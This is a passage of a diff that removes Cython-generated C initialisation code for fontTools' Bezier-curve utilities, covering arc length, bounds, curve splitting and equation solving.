__pyx_codeobj__18 = (PyObject*)__Pyx_PyCode_New(5, 0, 0, 9, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__17, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_calcCubicArcLengthCRecurse, 84, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__18)) __PYX_ERR(0, 84, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":104 - * - * - * @cython.returns(cython.double) # <<<<<<<<<<<<<< - * @cython.locals( - * pt1=cython.complex, - */ - __pyx_tuple__19 = PyTuple_Pack(6, __pyx_n_s_pt1, __pyx_n_s_pt2, __pyx_n_s_pt3, __pyx_n_s_pt4, __pyx_n_s_tolerance, __pyx_n_s_mult); if (unlikely(!__pyx_tuple__19)) __PYX_ERR(0, 104, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__19); - __Pyx_GIVEREF(__pyx_tuple__19); - __pyx_codeobj__20 = (PyObject*)__Pyx_PyCode_New(5, 0, 0, 6, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__19, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_calcCubicArcLengthC, 104, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__20)) __PYX_ERR(0, 104, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":151 - * - * - * def calcQuadraticArcLength(pt1, pt2, pt3): # <<<<<<<<<<<<<< - * """Calculates the arc length for a quadratic Bezier segment. - * - */ - __pyx_tuple__21 = PyTuple_Pack(3, __pyx_n_s_pt1, __pyx_n_s_pt2, __pyx_n_s_pt3); if (unlikely(!__pyx_tuple__21)) __PYX_ERR(0, 151, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__21); - __Pyx_GIVEREF(__pyx_tuple__21); - __pyx_codeobj__22 = (PyObject*)__Pyx_PyCode_New(3, 0, 0, 3, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__21, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_calcQuadraticArcLength, 151, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__22)) __PYX_ERR(0, 151, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":186 - * - * - * @cython.returns(cython.double) # <<<<<<<<<<<<<< - * @cython.locals( - * pt1=cython.complex, - */ - __pyx_tuple__23 = PyTuple_Pack(14, __pyx_n_s_pt1, __pyx_n_s_pt2, __pyx_n_s_pt3, __pyx_n_s_scale, __pyx_n_s_origDist, __pyx_n_s_a, __pyx_n_s_b, __pyx_n_s_x0, __pyx_n_s_x1, __pyx_n_s_Len, __pyx_n_s_d0, __pyx_n_s_d1, __pyx_n_s_d, __pyx_n_s_n); if (unlikely(!__pyx_tuple__23)) __PYX_ERR(0, 186, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__23); - __Pyx_GIVEREF(__pyx_tuple__23); - __pyx_codeobj__24 = (PyObject*)__Pyx_PyCode_New(3, 0, 0, 14, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__23, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_calcQuadraticArcLengthC, 186, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__24)) __PYX_ERR(0, 186, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":237 - * - * - * def approximateQuadraticArcLength(pt1, pt2, pt3): # <<<<<<<<<<<<<< - * """Calculates the arc length for a quadratic Bezier segment. - * - */ - __pyx_codeobj__25 = (PyObject*)__Pyx_PyCode_New(3, 0, 0, 3, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__21, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_approximateQuadraticArcLength, 237, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__25)) __PYX_ERR(0, 237, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":254 - * - * - * @cython.returns(cython.double) # <<<<<<<<<<<<<< - * @cython.locals( - * pt1=cython.complex, - */ - __pyx_tuple__26 = PyTuple_Pack(6, __pyx_n_s_pt1, __pyx_n_s_pt2, __pyx_n_s_pt3, __pyx_n_s_v0, __pyx_n_s_v1, __pyx_n_s_v2); if (unlikely(!__pyx_tuple__26)) __PYX_ERR(0, 254, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__26); - __Pyx_GIVEREF(__pyx_tuple__26); - __pyx_codeobj__27 = (PyObject*)__Pyx_PyCode_New(3, 0, 0, 6, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__26, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_approximateQuadraticArcLengthC, 254, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__27)) __PYX_ERR(0, 254, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":298 - * - * - * def calcQuadraticBounds(pt1, pt2, pt3): # <<<<<<<<<<<<<< - * """Calculates the bounding rectangle for a quadratic Bezier segment. - * - */ - __pyx_tuple__28 = PyTuple_Pack(14, __pyx_n_s_pt1, __pyx_n_s_pt2, __pyx_n_s_pt3, __pyx_n_s_ax, __pyx_n_s_ay, __pyx_n_s_bx, __pyx_n_s_by, __pyx_n_s_cx, __pyx_n_s_cy, __pyx_n_s_ax2, __pyx_n_s_ay2, __pyx_n_s_roots, __pyx_n_s_points, __pyx_n_s_t); if (unlikely(!__pyx_tuple__28)) __PYX_ERR(0, 298, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__28); - __Pyx_GIVEREF(__pyx_tuple__28); - __pyx_codeobj__29 = (PyObject*)__Pyx_PyCode_New(3, 0, 0, 14, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__28, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_calcQuadraticBounds, 298, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__29)) __PYX_ERR(0, 298, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":332 - * - * - * def approximateCubicArcLength(pt1, pt2, pt3, pt4): # <<<<<<<<<<<<<< - * """Approximates the arc length for a cubic Bezier segment. - * - */ - __pyx_tuple__30 = PyTuple_Pack(4, __pyx_n_s_pt1, __pyx_n_s_pt2, __pyx_n_s_pt3, __pyx_n_s_pt4); if (unlikely(!__pyx_tuple__30)) __PYX_ERR(0, 332, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__30); - __Pyx_GIVEREF(__pyx_tuple__30); - __pyx_codeobj__31 = (PyObject*)__Pyx_PyCode_New(4, 0, 0, 4, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__30, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_approximateCubicArcLength, 332, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__31)) __PYX_ERR(0, 332, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":362 - * - * - * @cython.returns(cython.double) # <<<<<<<<<<<<<< - * @cython.locals( - * pt1=cython.complex, - */ - __pyx_tuple__32 = PyTuple_Pack(9, __pyx_n_s_pt1, __pyx_n_s_pt2, __pyx_n_s_pt3, __pyx_n_s_pt4, __pyx_n_s_v0, __pyx_n_s_v1, __pyx_n_s_v2, __pyx_n_s_v3, __pyx_n_s_v4); if (unlikely(!__pyx_tuple__32)) __PYX_ERR(0, 362, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__32); - __Pyx_GIVEREF(__pyx_tuple__32); - __pyx_codeobj__33 = (PyObject*)__Pyx_PyCode_New(4, 0, 0, 9, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__32, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_approximateCubicArcLengthC, 362, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__33)) __PYX_ERR(0, 362, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":412 - * - * - * def calcCubicBounds(pt1, pt2, pt3, pt4): # <<<<<<<<<<<<<< - * """Calculates the bounding rectangle for a quadratic Bezier segment. - * - */ - __pyx_tuple__34 = PyTuple_Pack(23, __pyx_n_s_pt1, __pyx_n_s_pt2, __pyx_n_s_pt3, __pyx_n_s_pt4, __pyx_n_s_ax, __pyx_n_s_ay, __pyx_n_s_bx, __pyx_n_s_by, __pyx_n_s_cx, __pyx_n_s_cy, __pyx_n_s_dx, __pyx_n_s_dy, __pyx_n_s_ax3, __pyx_n_s_ay3, __pyx_n_s_bx2, __pyx_n_s_by2, __pyx_n_s_xRoots, __pyx_n_s_yRoots, __pyx_n_s_roots, __pyx_n_s_points, __pyx_n_s_t, __pyx_n_s_t, __pyx_n_s_t); if (unlikely(!__pyx_tuple__34)) __PYX_ERR(0, 412, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__34); - __Pyx_GIVEREF(__pyx_tuple__34); - __pyx_codeobj__35 = (PyObject*)__Pyx_PyCode_New(4, 0, 0, 23, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__34, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_calcCubicBounds, 412, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__35)) __PYX_ERR(0, 412, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":450 - * - * - * def splitLine(pt1, pt2, where, isHorizontal): # <<<<<<<<<<<<<< - * """Split a line at a given coordinate. - * - */ - __pyx_tuple__36 = PyTuple_Pack(15, __pyx_n_s_pt1, __pyx_n_s_pt2, __pyx_n_s_where, __pyx_n_s_isHorizontal, __pyx_n_s_pt1x, __pyx_n_s_pt1y, __pyx_n_s_pt2x, __pyx_n_s_pt2y, __pyx_n_s_ax, __pyx_n_s_ay, __pyx_n_s_bx, __pyx_n_s_by, __pyx_n_s_a, __pyx_n_s_t, __pyx_n_s_midPt); if (unlikely(!__pyx_tuple__36)) __PYX_ERR(0, 450, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__36); - __Pyx_GIVEREF(__pyx_tuple__36); - __pyx_codeobj__37 = (PyObject*)__Pyx_PyCode_New(4, 0, 0, 15, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__36, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_splitLine, 450, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__37)) __PYX_ERR(0, 450, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":507 - * - * - * def splitQuadratic(pt1, pt2, pt3, where, isHorizontal): # <<<<<<<<<<<<<< - * """Split a quadratic Bezier curve at a given coordinate. - * - */ - __pyx_tuple__38 = PyTuple_Pack(11, __pyx_n_s_pt1, __pyx_n_s_pt2, __pyx_n_s_pt3, __pyx_n_s_where, __pyx_n_s_isHorizontal, __pyx_n_s_a, __pyx_n_s_b, __pyx_n_s_c, __pyx_n_s_solutions, __pyx_n_s_genexpr, __pyx_n_s_genexpr); if (unlikely(!__pyx_tuple__38)) __PYX_ERR(0, 507, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__38); - __Pyx_GIVEREF(__pyx_tuple__38); - __pyx_codeobj__39 = (PyObject*)__Pyx_PyCode_New(5, 0, 0, 11, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__38, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_splitQuadratic, 507, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__39)) __PYX_ERR(0, 507, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":552 - * - * - * def splitCubic(pt1, pt2, pt3, pt4, where, isHorizontal): # <<<<<<<<<<<<<< - * """Split a cubic Bezier curve at a given coordinate. - * - */ - __pyx_tuple__40 = PyTuple_Pack(13, __pyx_n_s_pt1, __pyx_n_s_pt2, __pyx_n_s_pt3, __pyx_n_s_pt4, __pyx_n_s_where, __pyx_n_s_isHorizontal, __pyx_n_s_a, __pyx_n_s_b, __pyx_n_s_c, __pyx_n_s_d, __pyx_n_s_solutions, __pyx_n_s_genexpr, __pyx_n_s_genexpr); if (unlikely(!__pyx_tuple__40)) __PYX_ERR(0, 552, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__40); - __Pyx_GIVEREF(__pyx_tuple__40); - __pyx_codeobj__41 = (PyObject*)__Pyx_PyCode_New(6, 0, 0, 13, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__40, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_splitCubic, 552, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__41)) __PYX_ERR(0, 552, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":589 - * - * - * def splitQuadraticAtT(pt1, pt2, pt3, *ts): # <<<<<<<<<<<<<< - * """Split a quadratic Bezier curve at one or more values of t. - * - */ - __pyx_tuple__42 = PyTuple_Pack(7, __pyx_n_s_pt1, __pyx_n_s_pt2, __pyx_n_s_pt3, __pyx_n_s_ts, __pyx_n_s_a, __pyx_n_s_b, __pyx_n_s_c); if (unlikely(!__pyx_tuple__42)) __PYX_ERR(0, 589, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__42); - __Pyx_GIVEREF(__pyx_tuple__42); - __pyx_codeobj__43 = (PyObject*)__Pyx_PyCode_New(3, 0, 0, 7, 0, CO_OPTIMIZED|CO_NEWLOCALS|CO_VARARGS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__42, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_splitQuadraticAtT_2, 589, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__43)) __PYX_ERR(0, 589, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":613 - * - * - * def splitCubicAtT(pt1, pt2, pt3, pt4, *ts): # <<<<<<<<<<<<<< - * """Split a cubic Bezier curve at one or more values of t. - * - */ - __pyx_tuple__44 = PyTuple_Pack(9, __pyx_n_s_pt1, __pyx_n_s_pt2, __pyx_n_s_pt3, __pyx_n_s_pt4, __pyx_n_s_ts, __pyx_n_s_a, __pyx_n_s_b, __pyx_n_s_c, __pyx_n_s_d); if (unlikely(!__pyx_tuple__44)) __PYX_ERR(0, 613, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__44); - __Pyx_GIVEREF(__pyx_tuple__44); - __pyx_codeobj__45 = (PyObject*)__Pyx_PyCode_New(4, 0, 0, 9, 0, CO_OPTIMIZED|CO_NEWLOCALS|CO_VARARGS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__44, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_splitCubicAtT_2, 613, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__45)) __PYX_ERR(0, 613, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":637 - * - * - * @cython.locals( # <<<<<<<<<<<<<< - * pt1=cython.complex, - * pt2=cython.complex, - */ - __pyx_codeobj_ = (PyObject*)__Pyx_PyCode_New(4, 0, 0, 9, 0, CO_OPTIMIZED|CO_NEWLOCALS|CO_VARARGS|CO_GENERATOR, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__44, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_splitCubicAtTC, 637, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj_)) __PYX_ERR(0, 637, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":661 - * - * - * @cython.returns(cython.complex) # <<<<<<<<<<<<<< - * @cython.locals( - * t=cython.double, - */ - __pyx_tuple__46 = PyTuple_Pack(12, __pyx_n_s_pt1, __pyx_n_s_pt2, __pyx_n_s_pt3, __pyx_n_s_pt4, __pyx_n_s_t, __pyx_n_s_t2, __pyx_n_s_1_t, __pyx_n_s_1_t_2, __pyx_n_s_2_t_1_t, __pyx_n_s_pointAtT, __pyx_n_s_off1, __pyx_n_s_off2); if (unlikely(!__pyx_tuple__46)) __PYX_ERR(0, 661, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__46); - __Pyx_GIVEREF(__pyx_tuple__46); - __pyx_codeobj__47 = (PyObject*)__Pyx_PyCode_New(5, 0, 0, 12, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__46, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_splitCubicIntoTwoAtTC, 661, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__47)) __PYX_ERR(0, 661, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":701 - * - * - * def _splitQuadraticAtT(a, b, c, *ts): # <<<<<<<<<<<<<< - * ts = list(ts) - * segments = [] - */ - __pyx_tuple__48 = PyTuple_Pack(26, __pyx_n_s_a, __pyx_n_s_b, __pyx_n_s_c, __pyx_n_s_ts, __pyx_n_s_segments, __pyx_n_s_ax, __pyx_n_s_ay, __pyx_n_s_bx, __pyx_n_s_by, __pyx_n_s_cx, __pyx_n_s_cy, __pyx_n_s_i, __pyx_n_s_t1, __pyx_n_s_t2, __pyx_n_s_delta, __pyx_n_s_delta_2, __pyx_n_s_a1x, __pyx_n_s_a1y, __pyx_n_s_b1x, __pyx_n_s_b1y, __pyx_n_s_t1_2, __pyx_n_s_c1x, __pyx_n_s_c1y, __pyx_n_s_pt1, __pyx_n_s_pt2, __pyx_n_s_pt3); if (unlikely(!__pyx_tuple__48)) __PYX_ERR(0, 701, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__48); - __Pyx_GIVEREF(__pyx_tuple__48); - __pyx_codeobj__49 = (PyObject*)__Pyx_PyCode_New(3, 0, 0, 26, 0, CO_OPTIMIZED|CO_NEWLOCALS|CO_VARARGS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__48, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_splitQuadraticAtT, 701, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__49)) __PYX_ERR(0, 701, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":728 - * - * - * def _splitCubicAtT(a, b, c, d, *ts): # <<<<<<<<<<<<<< - * ts = list(ts) - * ts.insert(0, 0.0) - */ - __pyx_tuple__50 = PyTuple_Pack(34, __pyx_n_s_a, __pyx_n_s_b, __pyx_n_s_c, __pyx_n_s_d, __pyx_n_s_ts, __pyx_n_s_segments, __pyx_n_s_ax, __pyx_n_s_ay, __pyx_n_s_bx, __pyx_n_s_by, __pyx_n_s_cx, __pyx_n_s_cy, __pyx_n_s_dx, __pyx_n_s_dy, __pyx_n_s_i, __pyx_n_s_t1, __pyx_n_s_t2, __pyx_n_s_delta, __pyx_n_s_delta_2, __pyx_n_s_delta_3, __pyx_n_s_t1_2, __pyx_n_s_t1_3, __pyx_n_s_a1x, __pyx_n_s_a1y, __pyx_n_s_b1x, __pyx_n_s_b1y, __pyx_n_s_c1x, __pyx_n_s_c1y, __pyx_n_s_d1x, __pyx_n_s_d1y, __pyx_n_s_pt1, __pyx_n_s_pt2, __pyx_n_s_pt3, __pyx_n_s_pt4); if (unlikely(!__pyx_tuple__50)) __PYX_ERR(0, 728, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__50); - __Pyx_GIVEREF(__pyx_tuple__50); - __pyx_codeobj__51 = (PyObject*)__Pyx_PyCode_New(4, 0, 0, 34, 0, CO_OPTIMIZED|CO_NEWLOCALS|CO_VARARGS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__50, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_splitCubicAtT, 728, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__51)) __PYX_ERR(0, 728, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":763 - * - * - * @cython.locals( # <<<<<<<<<<<<<< - * a=cython.complex, - * b=cython.complex, - */ - __pyx_tuple__52 = PyTuple_Pack(21, __pyx_n_s_a, __pyx_n_s_b, __pyx_n_s_c, __pyx_n_s_d, __pyx_n_s_ts, __pyx_n_s_t1, __pyx_n_s_t2, __pyx_n_s_delta, __pyx_n_s_delta_2, __pyx_n_s_delta_3, __pyx_n_s_a1, __pyx_n_s_b1, __pyx_n_s_c1, __pyx_n_s_d1, __pyx_n_s_i, __pyx_n_s_t1_2, __pyx_n_s_t1_3, __pyx_n_s_pt1, __pyx_n_s_pt2, __pyx_n_s_pt3, __pyx_n_s_pt4); if (unlikely(!__pyx_tuple__52)) __PYX_ERR(0, 763, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__52); - __Pyx_GIVEREF(__pyx_tuple__52); - __pyx_codeobj__3 = (PyObject*)__Pyx_PyCode_New(4, 0, 0, 21, 0, CO_OPTIMIZED|CO_NEWLOCALS|CO_VARARGS|CO_GENERATOR, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__52, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_splitCubicAtTC_2, 763, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__3)) __PYX_ERR(0, 763, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":808 - * - * - * def solveQuadratic(a, b, c, sqrt=sqrt): # <<<<<<<<<<<<<< - * """Solve a quadratic equation. - * - */ - __pyx_tuple__53 = PyTuple_Pack(7, __pyx_n_s_a, __pyx_n_s_b, __pyx_n_s_c, __pyx_n_s_sqrt, __pyx_n_s_roots, __pyx_n_s_DD, __pyx_n_s_rDD); if (unlikely(!__pyx_tuple__53)) __PYX_ERR(0, 808, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__53); - __Pyx_GIVEREF(__pyx_tuple__53); - __pyx_codeobj__54 = (PyObject*)__Pyx_PyCode_New(4, 0, 0, 7, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__53, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_solveQuadratic, 808, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__54)) __PYX_ERR(0, 808, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":841 - * - * - * def solveCubic(a, b, c, d): # <<<<<<<<<<<<<< - * """Solve a cubic equation. - * - */ - __pyx_tuple__55 = PyTuple_Pack(19, __pyx_n_s_a, __pyx_n_s_b, __pyx_n_s_c, __pyx_n_s_d, __pyx_n_s_a1, __pyx_n_s_a2, __pyx_n_s_a3, __pyx_n_s_Q, __pyx_n_s_R, __pyx_n_s_R2, __pyx_n_s_Q3, __pyx_n_s_R2_Q3, __pyx_n_s_x, __pyx_n_s_theta, __pyx_n_s_rQ2, __pyx_n_s_a1_3, __pyx_n_s_x0, __pyx_n_s_x1, __pyx_n_s_x2); if (unlikely(!__pyx_tuple__55)) __PYX_ERR(0, 841, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__55); - __Pyx_GIVEREF(__pyx_tuple__55); - __pyx_codeobj__56 = (PyObject*)__Pyx_PyCode_New(4, 0, 0, 19, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__55, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_solveCubic, 841, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__56)) __PYX_ERR(0, 841, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":938 - * - * - * def calcQuadraticParameters(pt1, pt2, pt3): # <<<<<<<<<<<<<< - * x2, y2 = pt2 - * x3, y3 = pt3 - */ - __pyx_tuple__57 = PyTuple_Pack(13, __pyx_n_s_pt1, __pyx_n_s_pt2, __pyx_n_s_pt3, __pyx_n_s_x2, __pyx_n_s_y2, __pyx_n_s_x3, __pyx_n_s_y3, __pyx_n_s_cx, __pyx_n_s_cy, __pyx_n_s_bx, __pyx_n_s_by, __pyx_n_s_ax, __pyx_n_s_ay); if (unlikely(!__pyx_tuple__57)) __PYX_ERR(0, 938, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__57); - __Pyx_GIVEREF(__pyx_tuple__57); - __pyx_codeobj__58 = (PyObject*)__Pyx_PyCode_New(3, 0, 0, 13, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__57, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_calcQuadraticParameters, 938, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__58)) __PYX_ERR(0, 938, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":949 - * - * - * def calcCubicParameters(pt1, pt2, pt3, pt4): # <<<<<<<<<<<<<< - * x2, y2 = pt2 - * x3, y3 = pt3 - */ - __pyx_tuple__59 = PyTuple_Pack(18, __pyx_n_s_pt1, __pyx_n_s_pt2, __pyx_n_s_pt3, __pyx_n_s_pt4, __pyx_n_s_x2, __pyx_n_s_y2, __pyx_n_s_x3, __pyx_n_s_y3, __pyx_n_s_x4, __pyx_n_s_y4, __pyx_n_s_dx, __pyx_n_s_dy, __pyx_n_s_cx, __pyx_n_s_cy, __pyx_n_s_bx, __pyx_n_s_by, __pyx_n_s_ax, __pyx_n_s_ay); if (unlikely(!__pyx_tuple__59)) __PYX_ERR(0, 949, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__59); - __Pyx_GIVEREF(__pyx_tuple__59); - __pyx_codeobj__60 = (PyObject*)__Pyx_PyCode_New(4, 0, 0, 18, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__59, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_calcCubicParameters, 949, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__60)) __PYX_ERR(0, 949, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":981 - * - * - * def calcQuadraticPoints(a, b, c): # <<<<<<<<<<<<<< - * ax, ay = a - * bx, by = b - */ - __pyx_tuple__61 = PyTuple_Pack(15, __pyx_n_s_a, __pyx_n_s_b, __pyx_n_s_c, __pyx_n_s_ax, __pyx_n_s_ay, __pyx_n_s_bx, __pyx_n_s_by, __pyx_n_s_cx, __pyx_n_s_cy, __pyx_n_s_x1, __pyx_n_s_y1, __pyx_n_s_x2, __pyx_n_s_y2, __pyx_n_s_x3, __pyx_n_s_y3); if (unlikely(!__pyx_tuple__61)) __PYX_ERR(0, 981, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__61); - __Pyx_GIVEREF(__pyx_tuple__61); - __pyx_codeobj__62 = (PyObject*)__Pyx_PyCode_New(3, 0, 0, 15, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__61, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_calcQuadraticPoints, 981, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__62)) __PYX_ERR(0, 981, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":994 - * - * - * def calcCubicPoints(a, b, c, d): # <<<<<<<<<<<<<< - * ax, ay = a - * bx, by = b - */ - __pyx_tuple__63 = PyTuple_Pack(20, __pyx_n_s_a, __pyx_n_s_b, __pyx_n_s_c, 